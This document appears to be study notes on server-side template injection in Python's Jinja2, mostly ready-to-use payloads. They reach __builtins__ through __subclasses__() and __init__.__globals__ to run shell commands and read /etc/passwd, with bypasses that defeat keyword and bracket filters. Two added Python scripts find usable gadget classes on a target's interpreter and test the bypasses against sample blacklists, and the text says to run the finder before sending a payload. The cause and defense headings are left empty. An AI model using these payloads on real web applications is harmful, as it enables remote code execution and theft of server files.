1. Vulnerability cause:
2. Vulnerability defense:
3. Vulnerability exploitation:
__subclasses__()[59]: pick a class that overrides __init__. After listing the classes, inspect each one's __init__: a "slot wrapper" means __init__ is inherited from object and carries no __globals__, so look for one whose __init__ is not a wrapper. The indexes in these payloads come from a Python 2.7 interpreter ([40] is the file class, [59] is warnings.catch_warnings); they shift between versions, so confirm them on the target's Python or match by __name__ as payload (5) does.
(1) ''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123")
    (file is Python 2 only; __mro__[2] is object because Python 2's str mro is (str, basestring, object). On Python 3 use __mro__[1] or __base__.)
(2) ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')
(3) [].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')
    (linecache imports os, so values()[12] is the os module and values()[144] is os.system on that Python 2.7 build; dict ordering makes both indexes fragile, and values() is not subscriptable on Python 3.)
(4) {}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()
(5) (URL-decoded; %27 is a single quote)
{% for c in ''.__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{ c.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ipconfig").read()') }}
{% endif %}
{% endfor %}
    (Selecting the class by __name__ instead of a fixed index works across interpreter versions. ipconfig is the Windows command; use whoami or id on Linux.)
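Payloads (2) to (5) all rely on two facts: the index of a usable class in __subclasses__() differs between interpreters, and only a class with a Python-level __init__ exposes __init__.__globals__. The script below, an added example rather than code from these notes, does both checks on the running Python 3 interpreter with the standard library only: it implements the "wrapper" test from the note above, locates catch_warnings by name the way payload (5) does, lists every class that could replace [59], and follows the __import__ pivot to reach os without executing a command.

```python
"""Locating __subclasses__() gadgets by name instead of by a hard-coded
index.  Added example for these notes, not code from the original page;
standard library only, Python 3.  The page's indexes (40 = file,
59 = warnings.catch_warnings) are from Python 2.7 and do not hold here."""
import warnings  # loads warnings.catch_warnings, the class payload (5) targets


def has_python_init(cls):
    """The 'wrapper' test: a class that does not override __init__ inherits
    object.__init__, a slot wrapper with no __globals__.  Only a Python-level
    __init__ offers the __init__.__globals__ pivot used in payloads (2)-(5)."""
    return hasattr(cls.__init__, "__globals__")


def index_of(name):
    """Index of the first direct subclass of object named `name`, or None.
    This is what {% for c in ... %}{% if c.__name__ == name %} computes."""
    for i, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == name:
            return i
    return None


def gadget_classes():
    """(index, module.qualname) for every class whose __init__.__globals__
    carries __builtins__, i.e. every class that could stand in for [59]."""
    found = []
    for i, cls in enumerate(object.__subclasses__()):
        init = getattr(cls, "__init__", None)
        g = getattr(init, "__globals__", None)
        if g is not None and "__builtins__" in g:
            found.append((i, f"{cls.__module__}.{cls.__qualname__}"))
    return found


def builtins_via(name):
    """__subclasses__()[i].__init__.__globals__['__builtins__'] as a dict.
    Inside __main__ the entry is the builtins module, elsewhere it is a dict;
    both are normalised so ['eval'] and ['__import__'] work either way."""
    g = object.__subclasses__()[index_of(name)].__init__.__globals__
    b = g["__builtins__"]
    return b if isinstance(b, dict) else vars(b)


def import_via(name, module):
    """The __import__ pivot of payloads (2)-(5): return the module object
    reached through the gadget's globals, without running anything."""
    return builtins_via(name)["__import__"](module)


if __name__ == "__main__":
    print("catch_warnings index on this interpreter:", index_of("catch_warnings"))
    print("classes usable in place of [59]:", len(gadget_classes()))
    print("os reached via catch_warnings:", import_via("catch_warnings", "os"))
```

Run it on the target's Python version (or a matching Docker image) to get the real indexes before sending a payload; on a different build the hard-coded [59] will usually hit a class without __globals__ and the template will error out.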
4. Template attributes and functions:
__class__: the class of the object.
__bases__: tuple of direct base classes; __base__ is the first of them.
__mro__: the tuple of classes considered, in order, when resolving a method; its last element is object.
__subclasses__(): returns the direct subclasses of the class it is called on; called on object it lists every loaded class that inherits from object directly.
__globals__: attribute of a function, the global namespace of the module that defines it, as a dict (equivalent to func_globals in Python 2). This is what turns a class's __init__ into a handle on __builtins__ and on modules such as os.
5. Filter bypass:
Baseline, nothing filtered:
{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()
Quotes and [] filtered: replace subscripts with __getitem__ and pop, and take the string from a request parameter:
{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read()}}&path=/etc/passwd
Double underscore filtered: pass the attribute names as request parameters. Jinja2 falls back to getattr when obj[key] fails, so ''[request.args.class] resolves to ''.__class__ ([2] is the Python 2 str mro index; use [1] on Python 3):
{{ ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() }}&class=__class__&mro=__mro__&subclasses=__subclasses__
Same with request.values, which reads the parameters from either the query string or a POST body:
{{ ''[request.values.class][request.values.mro][2][request.values.subclasses]()[40]('/etc/passwd').read() }}
class=__class__&mro=__mro__&subclasses=__subclasses__
__getattribute__: invoked when an attribute is looked up on an instance, so [].__getattribute__(name) behaves like [].name with the name built at run time, which hides the literal __class__ from a keyword filter:
{{[].__getattribute__('X19jbGFzc19f'.decode('base64')).__base__.__subclasses__()[40]("/etc/passwd").read()}}
(X19jbGFzc19f is base64 for __class__; str.decode('base64') exists on Python 2 only)
{{[].__getattribute__('__c'+'lass__').__base__.__subclasses__()[40]("/etc/passwd").read()}}
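Each bypass in this section defeats a different blacklist, and the parameter trick only works because of how Jinja2 resolves obj[key]. The script below, an added example that is not code from these notes, makes both points on Python 3 with the standard library only: the token lists are hypothetical blacklists constructed here (not taken from any real WAF), jinja_subscript re-implements the documented lookup order of Jinja2's default Environment.getitem, and the mro index is 1 because Python 3's str mro is (str, object).

```python
"""Why the section-5 bypasses work.  Added example for these notes, not code
from the original page; standard library only, Python 3.  BLACKLIST tuples are
hypothetical filters constructed for the demonstration."""
import base64

# Constructed payload strings, one per bypass technique above.
PAYLOADS = {
    "plain":   "{{ {}.__class__.__bases__[0].__subclasses__() }}",
    "getitem": "{{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read() }}",
    "params":  "{{ ''[request.args.class][request.args.mro][1][request.args.subclasses]() }}",
    "b64":     "{{ [].__getattribute__('X19jbGFzc19f'.decode('base64')).__base__ }}",
    "concat":  "{{ [].__getattribute__('__c'+'lass__').__base__ }}",
}

NO_QUOTES_BRACKETS = ("'", '"', "[", "]")  # hypothetical filter 1
NO_DUNDER = ("__",)                        # hypothetical filter 2
NO_CLASS = ("__class__",)                  # hypothetical filter 3


def survives(template, tokens):
    """True when a substring blacklist would let the template through."""
    return not any(t in template for t in tokens)


def jinja_subscript(obj, key):
    """Lookup order of Jinja2's default Environment.getitem: try obj[key],
    and if that fails with a str key fall back to getattr(obj, key).
    So ''[request.args.class] becomes ''.__class__ even though the template
    source never contains a double underscore."""
    try:
        return obj[key]
    except (AttributeError, TypeError, LookupError):
        if isinstance(key, str):
            try:
                return getattr(obj, key)
            except AttributeError:
                pass
    return None  # Jinja2 returns Undefined; None is enough for this demo


def resolve_chain(obj, keys):
    for k in keys:
        obj = jinja_subscript(obj, k)
    return obj


def attribute_names_out_of_band():
    """''[class][mro][1][subclasses]() with the names supplied as request
    parameters.  The page uses [2] because Python 2's str mro is
    (str, basestring, object); on Python 3 object sits at [1]."""
    params = {"class": "__class__", "mro": "__mro__", "subclasses": "__subclasses__"}
    subclasses = resolve_chain("", [params["class"], params["mro"], 1, params["subclasses"]])
    return subclasses()  # same list as object.__subclasses__()


def decoded_attribute(b64="X19jbGFzc19f"):
    """Python 3 form of 'X19jbGFzc19f'.decode('base64'), which is Python 2 only."""
    return base64.b64decode(b64).decode()


if __name__ == "__main__":
    for name, tpl in PAYLOADS.items():
        print(f"{name:8} quotes/[]:{survives(tpl, NO_QUOTES_BRACKETS)!s:6} "
              f"__:{survives(tpl, NO_DUNDER)!s:6} __class__:{survives(tpl, NO_CLASS)!s:6}")
    print("''[request.args.class] ->", jinja_subscript("", "__class__"))
    print("decoded:", decoded_attribute(), "->", getattr([], decoded_attribute()))
```

The table it prints shows that no single payload beats every filter: the __getitem__/pop form still contains a double underscore, and the parameter form still needs quotes and brackets, so the bypass has to be chosen against the specific blacklist in front of the template engine. Substring blacklists are therefore not a fix; rendering user input as a template is the bug.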